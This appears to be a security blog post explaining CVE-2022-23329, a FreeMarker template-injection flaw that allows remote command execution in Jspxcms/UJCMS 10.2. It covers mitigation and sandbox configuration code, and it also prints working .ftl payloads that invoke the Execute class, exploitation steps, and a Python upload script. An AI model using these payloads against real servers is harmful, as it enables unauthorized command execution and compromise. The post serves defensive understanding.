In the world of content management systems, security vulnerabilities can spell disaster for businesses and individuals alike. One such critical vulnerability is CVE-2022-23329, affecting UJCMS, also known as Jspxcms, version 10.2. This exploit takes advantage of a misconfiguration in FreeMarker's template engine, specifically the unsafe use of `${"freemarker.template.utility.Execute"?new()}`. Attackers can exploit this to upload a template and execute arbitrary commands on the server, potentially leading to a full system compromise.

In this post, we'll break down what went wrong, how the exploit works (with code snippets), and most importantly, how to protect yourself.


## What is Jspxcms/UJCMS?

Jspxcms (UJCMS) is a popular, open-source Java-based content management system. It's widely used in enterprise environments for building websites and portals. Version 10.2. shipped with a serious misconfiguration involving FreeMarker templates.

## FreeMarker and the Execute Utility

FreeMarker is a template engine often embedded in Java web apps. For security, it restricts access to certain classes and methods. But in Jspxcms v10.2., templates can directly access Java classes and even instantiate them by name through the `?new` built-in, most notably `freemarker.template.utility.Execute`. This class provides a way to run system commands from inside the template engine.

Here's the problematic template code:

```
${"freemarker.template.utility.Execute"?new()("id")}
```

This line, when rendered, runs the system command id and prints its output!

## How Attackers Leverage File Upload

Jspxcms allows users to upload files, including FreeMarker templates (.ftl files). If user-uploaded files are not properly validated, attackers can upload a malicious .ftl file with the above code, then force the app to render the template and execute arbitrary commands.

Here's what such a malicious template looks like:

```
<#assign ex="freemarker.template.utility.Execute"?new()>
${ex("whoami")}
```

When rendered by the app, this prints the username under which the server process is running.

## Original References

- NIST NVD Entry for CVE-2022-23329
- Exploit Database #50739 (Jspxcms RCE)
- FreeMarker Official Documentation: Built-in execute

1. Checking vulnerability: Visit any Jspxcms file upload or theme/template area that allows users to upload or edit .ftl files.
2. Trigger render: Visit or otherwise force the server to render the template. This could be through a preview function or by accessing a page that loads the template.
3. Result: The server executes the commands inside the double quotes (id; uname -a), sending the output back to the attacker as part of the page render.

A Python exploit can look like:

```python
import requests

url = 'http://target.com/upload_template'
files = {'file': open('exploit.ftl', 'rb')}
session = requests.Session()
r = session.post(url, files=files, verify=False)
print('Template uploaded:', r.status_code)

# Now trigger the template render in your browser or via code if accessible
```

*Note: Paths and upload forms may vary based on Jspxcms customization.*

## Impact

- Run arbitrary system shell commands (RCE)
- Download/upload more malware (web shells)

## Mitigation

If you use Jspxcms v10.2., take the following steps:

- Upgrade Immediately: Update to the latest secure version where this template execution is disabled or restricted.
- Restrict Templates: Never allow untrusted users to upload or edit templates with dynamic scripting capabilities.
- Sandbox FreeMarker: Ensure FreeMarker is configured with a restricted sandbox, disabling or removing access to utility classes like freemarker.template.utility.Execute.

## Patch Example (for developers)

```java
import freemarker.core.TemplateClassResolver;
import freemarker.template.Configuration;

// When configuring FreeMarker
Configuration cfg = new Configuration(Configuration.VERSION_2_3_31);
// Remove access to dangerous classes: SAFER_RESOLVER refuses ?new on Execute,
// ObjectConstructor and JythonRuntime; ALLOWS_NOTHING_RESOLVER disables ?new entirely.
cfg.setNewBuiltinClassResolver(TemplateClassResolver.SAFER_RESOLVER);
```
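To see what the resolver setting above actually enforces, here is an added example (not code from the post or from Jspxcms) that renders the post's `?new` payload under SAFER_RESOLVER and ALLOWS_NOTHING_RESOLVER, which both refuse it, and a benign `?new` target that only the former still permits. It assumes FreeMarker 2.3.31 on the classpath; the class and helper names are my own.

```java
import java.io.IOException;
import java.io.StringReader;
import java.io.StringWriter;
import java.util.Collections;
import freemarker.core.TemplateClassResolver;
import freemarker.template.Configuration;
import freemarker.template.Template;
import freemarker.template.TemplateException;

public class NewBuiltinPolicyCheck {
    // The template from the post: instantiates Execute via the ?new built-in.
    static final String EXECUTE_PAYLOAD =
        "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"whoami\")}";
    // A harmless TemplateModel class, to show what SAFER_RESOLVER still permits.
    static final String BENIGN_NEW =
        "<#assign esc=\"freemarker.template.utility.HtmlEscape\"?new()><@esc>1 & 2</@esc>";

    // Hypothetical helper: a Configuration with the given ?new class policy.
    static Configuration configure(TemplateClassResolver resolver) {
        Configuration cfg = new Configuration(Configuration.VERSION_2_3_31);
        cfg.setNewBuiltinClassResolver(resolver);
        return cfg;
    }

    // Renders the source with an empty data model; returns true when the resolver
    // refused the ?new call. FreeMarker checks the class at render time, not parse
    // time, so the refusal surfaces from process(). Nothing is rendered unrestricted.
    static boolean renderIsBlocked(Configuration cfg, String source) {
        try {
            Template t = new Template("untrusted.ftl", new StringReader(source), cfg);
            t.process(Collections.emptyMap(), new StringWriter());
            return false;
        } catch (TemplateException e) {
            // Message reads like: "Instantiating freemarker.template.utility.Execute
            // is not allowed in the template for security reasons."
            return true;
        } catch (IOException e) {
            throw new IllegalStateException("template could not be parsed", e);
        }
    }

    public static void main(String[] args) {
        Configuration safer = configure(TemplateClassResolver.SAFER_RESOLVER);
        Configuration none = configure(TemplateClassResolver.ALLOWS_NOTHING_RESOLVER);
        System.out.println("SAFER_RESOLVER blocks Execute payload: " + renderIsBlocked(safer, EXECUTE_PAYLOAD));
        System.out.println("SAFER_RESOLVER allows benign ?new:     " + !renderIsBlocked(safer, BENIGN_NEW));
        System.out.println("ALLOWS_NOTHING blocks benign ?new too: " + renderIsBlocked(none, BENIGN_NEW));
    }
}
```

If your templates never legitimately use `?new`, ALLOWS_NOTHING_RESOLVER is the simpler policy, since it needs no list of forbidden classes.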

## Conclusion

CVE-2022-23329 underscores the danger of mixing template engines with unrestricted code execution, especially when combined with untrusted file upload. If you use Jspxcms or similar systems, patch now, audit your user permissions, and tighten your template engine!

Stay safe, keep up with security advisories, and always review what kind of files your users can upload and execute.


## Timeline

Published on: 02/04/2022 22:15:00 UTC
Last modified on: 02/09/2022 02:43:00 UTC